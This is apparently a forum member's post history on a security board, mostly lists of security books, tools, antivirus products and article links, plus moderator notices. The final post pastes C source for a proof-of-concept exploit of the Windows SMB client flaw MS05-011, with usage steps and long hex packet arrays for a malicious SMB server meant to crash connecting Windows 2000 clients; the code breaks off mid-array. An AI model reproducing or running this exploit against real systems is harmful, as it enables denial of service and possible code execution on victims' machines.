RemoteConnection
Members-
Content Count
109 -
Joined
-
Last visited
Everything posted by RemoteConnection
-
Hi all, I hope that I posted in related forum, Here u'll find lots of websites that offer Fonts ! hope to enjoy Notice from cmatcmextra: Plagerized from here, quote tags added. Various urls and descriptions are the same. So that's it RemoteConnection, I warned you if you broke a rule once more you'd be banned. So guess what?
-
Dear alexia, Really Thanks . You sent really wondeful collection, but did u have them or obtained it from somewhere?
-
hi all, In this topic I'm gonna start explain about windows security scanners , leave your comments and hope to enjoy :: Nsauditor Network Security Auditor Nauditor is a network security scanner that allows to audit and monitor network computers for possible vulnerabilities , to see all open ports and owner program names, including the process loaded modules, kernel objects, memory details, remote address and state of connections, dns name, country where from, service associated with connection, possible trojans associated with port and service description. also Nsauditor can reveal and catalog a variety of information, including installed software, shares, users, drives, hotfixes, NetBios, RPC, SQL and SNMP information, open ports. URL : http://www.nsauditor.com/ :: Shadow Web Analyzer assist you in analysing your own web site in search of potential errors. Link : http://www.safety-lab.com/en/ :: Shadow Security Scanner Shadow Security Scanner has been developed to provide a secure, prompt and reliable detection of a vast range of security system holes. this scanner supports : FTP, SSH, Telnet, SMTP, DNS, Finger, HTTP, POP3, IMAP, NetBIOS, NFS, NNTP, SNMP, Squid (Shadow Security Scanner is the only scanner to audit proxy servers - other scanners just verify ports availability) Link : http://www.safety-lab.com/en/products/securityscanner.htm
-
Integrating Xp With Sp2 Slip atreaming XP
RemoteConnection replied to sujith's topic in Security issues & Exploits
wow, Thanks :huh:but did u test this mehtod ? -
Linux Security Books
RemoteConnection replied to RemoteConnection's topic in Security issues & Exploits
:: Mastering FreeBSD and OpenBSD Security ::Yanek Korff, Paco Hope, Bruce PotterPaperback, 350 pagesISBN 0-596-00626-8Mastering FreeBSD and OpenBSD Security features broad and deep explanations of how how to secure most critical systems.:: Windows Server 2003 Security: A Technical Reference ::Roberta BraggPaperback, 1176 pagesISBN 0-321-30501-9with this book you'll learn Secure remote access using VPNs via IPSec, SSL, SMB signing, LDAP signing, and more ...:: Apache Security ::Ivan RisticPaperback, 280 pagesISBN 0-596-00724-8you'll learn install and configure Apache * prevent denial of service (DoS) and other attacks * securely share servers * control logging and monitoring * secure custom-written web applications and so on -
Linux Security Books
RemoteConnection replied to RemoteConnection's topic in Security issues & Exploits
well, I'm gonna tell more books, but they're in network security section .:: Hacking Exposed: Network Security Secrets & Solutions, 5th Edition ::Stuart McClure, Joel Scambray, George KurtzPaperback, 750 pagesISBN 0-072-26081-5Topics :Security vulnerabilities of operating systems, applications, and network devices; * Administrative procedures that will help defeat them; * Techniques for hacking Windows 95, Windows 98, Windows Me, Windows NT 4.0, Windows 2000, Novell NetWare, and Unix; * Strategies for breaking into (or bringing down) telephony devices, routers, and firewalls.:: Stealing the Network: How to Own a Continent ::FX, Paul Craig, Joe Grand, Tim Mullen, Fyodor, Ryan Russell, Jay BealePaperback, 432 pagesISBN 1-931-83605-1Combines a fictional story with real-world technology.::Wi-Foo: The Secrets of Wireless Hacking ::Andrew Vladimirov, Konstantin V. Gavrilenko, Andrei A. MikhailovskyPaperback, 608 pagesISBN 0-321-20217-1If you're a hacker or security auditor, this book will get you in. If you're a netadmin, sysadmin, consultant, or home user, it'll keep everyone else out.:: Network Security Hacks ::Andrew LockhartPaperback, 304 pagesISBN 0-596-00643-8network security hacks is not a longwinded treatise on security theory. Instead, this information packed little book provides 100 quick, practical, and clever things to do to help make Linux, UNIX, or Windows networks more secure today.:: The Art of Computer Virus Research and Defense ::Peter SzorPaperback, 744 pagesISBN 0-321-30454-3 Symantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. this list will update soon. -
Linux Security Tools
RemoteConnection replied to RemoteConnection's topic in Security issues & Exploits
Well, Thanks dexter , let's update the list . here's the list of AVs in linux : # F-Secure.com - Anti-Virus for Linux firewalls https://www.f-secure.com/en/web/home_global/products - Anti-Virus for File Servers https://www.f-secure.com/en/web/home_global/products - Anti-Virus for Desktops and Laptops https://www.f-secure.com/en/web/home_global/products # Kaspersky Lab - Workstation/Server/eMail gateway protection http://usa.kaspersky.com/?tgroup=4&pgroup=11 # Sophos.com - Anti-Virus for Unix/Linux https://www.sophos.com/products/software/anus/savunix.html - SOPHOS - Sophos Anti-Virus Interface for Linux https://www.sophos.com/en-us.aspx - MailMonitor for SMTP https://www.sophos.com/products/software/mator/mmsmtp.html # Symantec.com - I-Gear: Web and FTP filtering (also a version for ISP's) http://forums.xisto.com/no_longer_exists/ - Mail-Gear: (up to and including version 1.2.x) # TrendMicro.com - Interscan VirusWall - Internet Gateway - detect/scan SMTP, HTTP and FTP http://www.antivirus.com/security-software/index.html - InterScan eManager - plug-in for Interscan to manage spam and message content, blocking file attachments, greeting cards, melissa or variants, ... http://www.antivirus.com/security-software/index.html - ScanMail for HP/OpenMail http://forums.xisto.com/no_longer_exists/ - ServerProtect http://forums.xisto.com/no_longer_exists/ # ClamAv.net - Clam anti-virus. Open source virus protection for mail servers. http://www.clamav.net/ -
Hi, I've posted some security tools and links in my last posts,I preferd to post new topic and send he extra here : Network Sniffers # DSniff https://www.monkey.org/~dugsong/dsniff/ # Ethereal - full network protocol sniffer/analyzer http://forums.xisto.com/no_longer_exists/ # IPTraf - curses based IP LAN monitor http://iptraf.seul.org/ # TcpDump - network monitor and data acquisition http://www.tcpdump.org/ # KISMET - 802.11 wireless network detector, sniffer and intrusion detection system http://www.kismetwireless.net/ Online Tools # AutomatedScanning.com - commercial service # Anonymizer.com - Anonymous surfing Port scanners # nmap - Port scanner and security scanning and investigation tool https://nmap.org/index.html # NmapFe - GUI front-end to NMAP http://www.advogato.org/proj/NmapFE/ # ndiff - Compares nmap scans to detect network changes to port states. http://www.vinecorp.com/ndiff/ # strobe - fast network scanner (open e-mail relays) http://forums.xisto.com/no_longer_exists/ # portscan - C++ Port Scanner will try to connect on every port you define for a particular host. http://www.ricksoft.co.uk/downloads/portscan/portscan.htm # portscan - Perl script to scan for open ports http://forums.xisto.com/no_longer_exists/ This list will update soon
-
Linux Security Books
RemoteConnection replied to RemoteConnection's topic in Security issues & Exploits
well,I have some ebooks for starters , send PM -
hi friends, you know that there're lots of attacking methods in network security . Here's a collection of links for different kind of attacks : SYN packet manipulation -- SYN packet manipulation http://www-03.ibm.com/security/xforce/ -- Syn Flood experiment http://forums.xisto.com/no_longer_exists/ -- SYN Cookie http://cr.yp.to/syncookies.html Smurf DOS -- ISS.com: Description http://www-03.ibm.com/security/xforce/ -- GRC.com: DDOS Anatomy http://forums.xisto.com/no_longer_exists/ IRC (Internet Relay Chat) Client attacks -- IIS.com: Description http://www-03.ibm.com/security/xforce/ Service attacks -- Buffer Overflow attacks http://www-03.ibm.com/security/xforce/ -- Buffer overflow vulnerabilities explained http://forums.xisto.com/no_longer_exists/ Session Hijacking -- IIS.com: Descriptions http://www-03.ibm.com/security/xforce/ ARP Cache poisoning -- Wireless Access Points and ARP Poisoning http://forums.xisto.com/no_longer_exists/ -- Wireless Attacks Threaten Wired Networks http://searchsecurity.techtarget.com/ if you know more plz send reply
-
hi all, here's a collection of top linux security books and you can obtain each one by searching in amazon.com . If you know more plz add it here ."Hacking Linux Exposed"by Brian Hatch, James B. Lee, George KurtzISBN #0072225645, McGraw-Hill (2nd edition)"Maximum Linux Security: A Hacker's Guide to Protecting Your Linux Server and Workstation"by Anonymous and John RayISBN #0672321343, SamsCovers not only audit and protection methods but also investigates and explains the attacks and how they work. "Network Intrusion Detection: An Analyst's Handbook"by Stephen Northcutt, Donald McLachlan, Judy NovakISBN #0735710082, New Riders Publishing"SSH, the Secure Shell : The Definitive Guide"by Daniel J. Barrett, Richard SilvermanISBN #0596000111, O'Reilly & Associates"Computer Security Incident Handling Step by Step"by Stephen NorthcuttISBN #0967299217"Snort 2.1 Intrusion Detection, Second Edition"by Jay Beale, CaswellISBN #1931836043, Syngress"Ethereal Packet Sniffing"by Angela D. Orebaugh, Gilbert Ramirez, Ethereal.comISBN #1932266828, Syngress"Nessus Network Auditing (Jay Beale's Open Source Security)"by Renaud Deraison, Noam Rathaus, HD Moore, Raven Alder, George Theall, Andy Johnston, Jimmy AldersonISBN #1931836086, Syngress"Security Assessment: Case Studies for Implementing the NSA IAM"by Russ Rogers, Greg Miles, Ed Fuller, Ted DykstraISBN #1932266968, Syngress"Network Security Assessment"by Chris McNabISBN #059600611X, O'Reilly"A Practical Guide to Security Assessment"by Sudhanshu KairabISBN #0849317061, Auerbach Publicationshope to be useful
-
Which One Is Better As A Secure Os?
RemoteConnection replied to RemoteConnection's topic in Security issues & Exploits
In last post I've added some linux security links , also here's some security tools for linux : :: ipfilter - packet filter http://forums.xisto.com/no_longer_exists/ :: rsaeuro - cryptographic toolkit http://forums.xisto.com/no_longer_exists/ :: SSH - Comercial versions SSH1 and SSH2 http://forums.xisto.com/no_longer_exists/ :: SSL - Encrypted telnet http://forums.xisto.com/no_longer_exists/ :: WinSCP - scp (secure copy) client. http://forums.xisto.com/no_longer_exists/ :: Netlog - TCP and UDP suspicious traffic logging system http://it.tamu.edu/Former_Departments.php :: TAMU - Texas A&M University developed tools http://it.tamu.edu/Former_Departments.php :: PuTTY - Telnet, SSH, SCP, SFTP client http://forums.xisto.com/no_longer_exists/ :: SARA - Security Auditor's Research Assistant - network security vulnerability scanner. http://www-arc.com/sara/sara.html :: satan - Security Administrator Tool for Analyzing Networks http://forums.xisto.com/no_longer_exists/ :: Rkdet - root kit detector daemon. Intended to catch someone installing a rootkit or running a packet sniffer. http://vancouver-webpages.com/rkdet/ hope to enjoy -
Which One Is Better As A Secure Os?
RemoteConnection replied to RemoteConnection's topic in Security issues & Exploits
Well Thanks Sunny, Let me add some security links for linux : - Apache Web Server Security Tips http://httpd.apache.org/docs/current/misc/security_tips.html - Red Hat Security Page http://forums.xisto.com/no_longer_exists/ - XForce (ISS) Library http://forums.xisto.com/no_longer_exists/ - BugTraq http://forums.xisto.com/no_longer_exists/ - CERT Coordination Center http://www.cert.org/ - CGI & Perl http://forums.xisto.com/no_longer_exists/ - CIAC - Computer Incident Advisory Capability http://forums.xisto.com/no_longer_exists/ - COAST Hotlist: Computer Security, Law & Privacy http://forums.xisto.com/no_longer_exists/ - COAST Hotlist: Internet Firewalls http://www.cerias.purdue.edu/site/about/history/coast_resources/firewalls/ - COAST Security Archive http://www.cerias.purdue.edu/about/history/coast/archive/index.html - Dave Dittrich's Security Page http://forums.xisto.com/no_longer_exists/ - Firewall Wizards Mail Archive http://forums.xisto.com/no_longer_exists/ - HackerWacker http://www.hackerwhacker.com/ - IP Masquerading Site http://forums.xisto.com/no_longer_exists/ - Lance Spitzner's Security Publications http://forums.xisto.com/no_longer_exists/ -Linux Security Resources http://forums.xisto.com/no_longer_exists/ - Matt's Unix Security Page http://www.deter.com/unix/ - NIH: Computer Security Information http://forums.xisto.com/no_longer_exists/ - N- IPC: National Infrastructure Protection Center http://forums.xisto.com/no_longer_exists/ - Linux Security Systems and Tools http://www.linas.org/linux/secure.html - Root Shell http://forums.xisto.com/no_longer_exists/ - SANS Institute http://www.sans.org/ - Security Focus http://forums.xisto.com/no_longer_exists/ - Security Portal http://forums.xisto.com/no_longer_exists/ - WWW Security Resources http://www.w3.org/Security/ Have fun -
Which One Is Better As A Secure Os?
RemoteConnection replied to RemoteConnection's topic in Security issues & Exploits
---- Well , Friends sent their comments about OSes security, but after all If you selected your perfered OS , what will you do for securing it ? -
hi all, have u ever heard about it's III version ? I saw the images of this game and they really high graphical! I really enjoyed but i don't know does it have published or not and if yes where to we can get it ? I mean via BizTorrrent and sth like that.
-
well , nice method , but the latest version of Red Alert was 2 ! I thing about five years ago yea ? right now i don't thing that anybody plays this game .... I really waiting for it's version III , but i don't know did they try for da?
-
well this article discusses step-by-step how to compile, install, chroot and configure a secure Apache 2 web server. By: <name removed> Contact : <email address removed> Link : https://www.symantec.com/connect/articles/securing-apache-2-step-step Notice from cmatcmextra: Personal information removed.
-
another article,this discusses two important tools provided by Microsoft, IIS Lockdown and Urlscan, that target significant security-related configuration problems for IIS versions 6.0, 5.0, and earlier. By: <removed> Contact : <removed> Link : https://www.symantec.com/connect/articles/iis-lockdown-and-urlscan Notice from cmatcmextra: Personal info removed. Next post...
-
hey ,this article discusses the major default configuration and design changes incorporated in IIS 6.0 to make it a more secure platform for hosting critical web applications. By: <---> Contact : <---> Link : https://www.symantec.com/connect/articles/iis-60-security Notice from cmatcmextra: Personal info removed -- again
-
Hi friends, this article shows how shellcode can be written and executed on a Windows host without using any native API calls at all . By : <== REMOVED FOR THE 4TH TIME ==> Contact : <== REMOVED FOR THE 4TH TIME ==> Link to this article : https://www.symantec.com/connect/articles/windows-syscall-shellcode Notice from cmatcmextra: Removed personal info
-
Microsoft Server Message Block (SMB) Remote Exploit (MS05-011) /** Windows SMB Client Transaction Response Handling** MS05-011* CAN-2005-0045** This works against Win2k** cybertronic[at]gmx[dot]net* [url="http://forums.xisto.com/no_longer_exists/;** usage:* gcc -o mssmb_poc mssmb_poc.c* ./mssmb_poc** connect via \\ip* and hit the netbios folder!** ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,* 0x00000000)* PAGE_FAULT_IN_NONPAGED_AREA** The Client reboots immediately** Technical Details:* -----------------** The driver MRXSMB.SYS is responsible for performing SMB* client operations and processing the responses returned* by an SMB server service. A number of important Windows* File Sharing operations, and all RPC-over-named-pipes,* use the SMB commands Trans (25h) and Trans2 (32h). A* malicious SMB server can respond with specially crafted* Transaction response data that will cause an overflow* wherever the data is handled, either in MRXSMB.SYS or* in client code to which it provides data. One example* would be if the** file name length field** and the** short file name length field** in a Trans2 FIND_FIRST2 response packet can be supplied* with inappropriately large values in order to cause an* excessive memcpy to occur when the data is handled.* In the case of these examples an attacker could leverage* file:// links, that when clicked by a remote user, would* lead to code execution.**/#include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>#define PORT 445unsigned char SmbNeg[] ="\x00\x00\x00\x55""\xff\x53\x4d\x42" // SMB"\x72" // SMB Command: Negotiate Protocol (0x72)"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)"\x98" // Flags: 0x98"\x53\xc8" // Flags2 : 0xc853"\x00\x00" // Process ID High: 0"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000"\x00\x00" // Reserved: 0000"\x00\x00" // Tree ID: 0"\xff\xfe" // Process ID: 65279"\x00\x00" // User ID: 0"\x00\x00" // Multiplex ID: 0"\x11" // Word Count (WCT): 17"\x05\x00" // Dialect Index: 5, greater than LANMAN2.1"\x03" // Security Mode: 0x03"\x0a\x00" // Max Mpx Count: 10"\x01\x00" // Max VCs: 1"\x04\x11\x00\x00" // Max Buffer Size: 4356"\x00\x00\x01\x00" // Max Raw Buffer 65536"\x00\x00\x00\x00" // Session Key: 0x00000000"\xfd\xe3\x00\x80" // Capabilities: 0x8000e3fd"\x52\xa2\x4e\x73\xcb\x75\xc5\x01" // System Time: Jun 20, 2005 12:08:32.327125000"\x88\xff" // Server Time Zone: /120 min from UTC"\x00" // Key Length: 0"\x10\x00" // Byte Count (BCC): 16"\x9e\x12\xd7\x77\xd4\x59\x6c\x40" // Server GUID: 9E12D777D4596C40"\xbc\xc0\xb4\x22\x40\x50\x01\xd4";// BCC0B422405001D4unsigned char SessionSetupAndXNeg[] = // Negotiate ERROR Response"\x00\x00\x01\x1b""\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x04\xff\x00\x1b\x01\x00\x00\xa6\x00\xf0\x00\x4e\x54\x4c\x4d\x53""\x53\x50\x00\x02\x00\x00\x00\x12\x00\x12\x00\x30\x00\x00\x00\x15""\x82\x8a\xe0""\x00\x00\x00\x00\x00\x00\x00\x00" // NTLM Challenge"\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x64\x00\x42\x00\x00\x00""\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00""\x43\x00\x02\x00\x12\x00\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00""\x43\x00\x45\x00\x50\x00\x43\x00\x01\x00\x12\x00\x53\x00\x45\x00""\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x04\x00""\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00""\x70\x00\x63\x00\x03\x00\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00""\x69\x00\x63\x00\x65\x00\x70\x00\x63\x00\x06\x00\x04\x00\x01\x00""\x00\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f""\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57""\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32""\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20""\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00";unsigned char SessionSetupAndXAuth[] ="\x00\x00\x00\x75""\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x4e\x57\x00\x69\x00""\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00""\x31\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00""\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00""\x41\x00\x4e\x00\x20\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00""\x65\x00\x72\x00\x00";unsigned char TreeConnectAndX[] ="\x00\x00\x00\x38""\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x07\xff\x00\x38\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x07""\x00\x49\x50\x43\x00\x00\x00\x00";unsigned char SmbNtCreate [] ="\x00\x00\x00\x87""\xff\x53\x4d\x42" // SMB"\xa2" // SMB Command: NT Create AndX (0xa2)"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)"\x98" // Flags: 0x98"\x07\xc8" // Flags2 : 0xc807"\x00\x00" // Process ID High: 0"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000"\x00\x00" // Reserved: 0000"\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // User ID: 0"\x00\x00" // Multiplex ID: 0"\x2a" // Word Count (WCT): 42"\xff" // AndXCommand: No further commands (0xff)"\x00" // Reserved: 00"\x87\x00" // AndXOffset: 135"\x00" // Oplock level: No oplock granted (0)"\x00\x00" // FID: 0"\x01\x00\x00\x00" // Create action: The file existed and was opened (1)"\x00\x00\x00\x00\x00\x00\x00\x00" // Created: No time specified (0)"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Access: No time specified (0)"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Write: No time specified (0)"\x00\x00\x00\x00\x00\x00\x00\x00" // Change: No time specified (0)"\x80\x00\x00\x00" // File Attributes: 0x00000080"\x00\x10\x00\x00\x00\x00\x00\x00" // Allocation Size: 4096"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0"\x02\x00" // File Type: Named pipe in message mode (2)"\xff\x05" // IPC State: 0x05ff"\x00" // Is Directory: This is NOT a directory (0)"\x00\x00" // Byte Count (BCC): 0// crap"\x00\x00\x00\x0f\x00\x00\x00\x00""\x00\x74\x7a\x4f\xac\x2d\xdf\xd9""\x11\xb9\x20\x00\x10\xdc\x9b\x01""\x12\x00\x9b\x01\x12\x00\x1b\xc2";unsigned char DceRpc[] ="\x00\x00\x00\x7c""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x44\x00\x00\x00\x00\x00\x38\x00\x00\x00\x44\x00\x38""\x00\x00\x00\x00\x00\x45\x00\x00\x05\x00\x0c\x03\x10\x00\x00\x00""\x44\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10""\x00\x00\x00\x00" // Assoc Group"\x0d\x00\x5c\x50\x49\x50\x45\x5c""\x00\x00\x00" // srv or wks"\x73\x76\x63\x00\xff\x01\x00\x00\x00\x00\x00\x00\x00\x04\x5d\x88""\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00""\x00";unsigned char WksSvc[] ="\x00\x00\x00\xb0""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x78\x00\x00\x00\x00\x00\x38\x00\x00\x00\x78\x00\x38""\x00\x00\x00\x00\x00\x79\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x78\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00""\x64\x00\x00\x00\xb8\x0f\x16\x00\xf4\x01\x00\x00\xe6\x0f\x16\x00""\xd2\x0f\x16\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0a\x00\x00\x00""\x00\x00\x00\x00\x0a\x00\x00\x00\x53\x00\x45\x00\x52\x00\x56\x00""\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x00\x00\x0a\x00\x00\x00""\x00\x00\x00\x00\x0a\x00\x00\x00\x57\x00\x4f\x00\x52\x00\x4b\x00""\x47\x00\x52\x00\x4f\x00\x55\x00\x50\x00\x00\x00\x00\x00\x00\x00";unsigned char SrvSvc[] ="\x00\x00\x00\xac""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x74\x00\x00\x00\x00\x00\x38\x00\x00\x00\x74\x00\x38""\x00\x00\x00\x00\x00\x75\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x74\x00\x00\x00\x01\x00\x00\x00\x5c\x00\x00\x00\x00\x00\x00\x00""\x65\x00\x00\x00\x68\x3d\x14\x00\xf4\x01\x00\x00""\x80\x3d\x14\x00" // Server IP"\x05\x00\x00\x00\x01\x00\x00\x00\x03\x10\x05\x00\x9c\x3d\x14\x00""\x0e\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00""\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00" // Server IP ( UNICODE )"\x32\x00\x2e\x00\x31\x00\x30\x00\x33\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x55\x00""\x00\x00\x00\x00";unsigned char SmbClose[] ="\x00\x00\x00\x23""\xff\x53\x4d\x42" // SMB"\x04" // SMB Command: Close (0x04)"\x00\x00\x00\x00" // NT Status: STATUS_SUCCESS (0x00000000)"\x98" // Flags: 0x98"\x07\xc8" // Flags2 : 0xc807"\x00\x00" // Process ID High: 0"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000"\x00\x00" // Reserved: 0000"\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x00" // Word Count (WCT): 0"\x00\x00"; // Byte Count (BCC): 0unsigned char NetrShareEnum[] ="\x00\x00\x01\x90""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x58\x01\x00\x00\x00\x00\x38\x00\x00\x00\x58\x01\x38""\x00\x00\x00\x00\x00\x59\x01\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x58\x01\x00\x00\x01\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00""\x01\x00\x00\x00\x01\x00\x00\x00\x54\x0a\x17\x00\x04\x00\x00\x00""\xa0\x28\x16\x00\x04\x00\x00\x00\x80\x48\x16\x00\x03\x00\x00\x80""\x8a\x48\x16\x00\x6e\x48\x16\x00\x00\x00\x00\x00\x7e\x48\x16\x00""\x48\x48\x16\x00\x00\x00\x00\x80\x56\x48\x16\x00\x20\x48\x16\x00""\x00\x00\x00\x80\x26\x48\x16\x00\x05\x00\x00\x00\x00\x00\x00\x00""\x05\x00\x00\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x36\x00""\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x52\x00\x65\x00""\x6d\x00\x6f\x00\x74\x00\x65\x00\x2d\x00\x49\x00\x50\x00\x43\x00""\x00\x00\x37\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00""\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00""\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00""\x07\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x41\x00\x44\x00""\x4d\x00\x49\x00\x4e\x00\x24\x00\x00\x00\x00\x00\x0c\x00\x00\x00""\x00\x00\x00\x00\x0c\x00\x00\x00\x52\x00\x65\x00\x6d\x00\x6f\x00""\x74\x00\x65\x00\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x00\x00""\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x43\x00\x24\x00""\x00\x00\x39\x00\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00""\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00""\x66\x00\x72\x00\x65\x00\x69\x00\x67\x00\x61\x00\x62\x00\x65\x00""\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";unsigned char OpenPrinterEx[] ="\x00\x00\x00\x68""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38""\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x24\xd7\x9c\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10""\xdc\x4a\x6b\xbb\x00\x00\x00\x00";unsigned char ClosePrinter[] ="\x00\x00\x00\x68""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38""\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00";unsigned char OpenHklm[] ="\x00\x00\x00\x68""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex ID: 0"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38""\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00""\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00""\x00\x00\x00\x00\x4e\x4c\xb2\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10""\xdc\x4a\x6b\xbb\x00\x00\x00\x00";unsigned char OpenKey[] ="\x00\x00\x00\x68""\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\x00\x00" // Tree ID: 0"\x00\x00" // Process ID: 0"\x00\x00" // USER ID"\x00\x00" // Multiplex 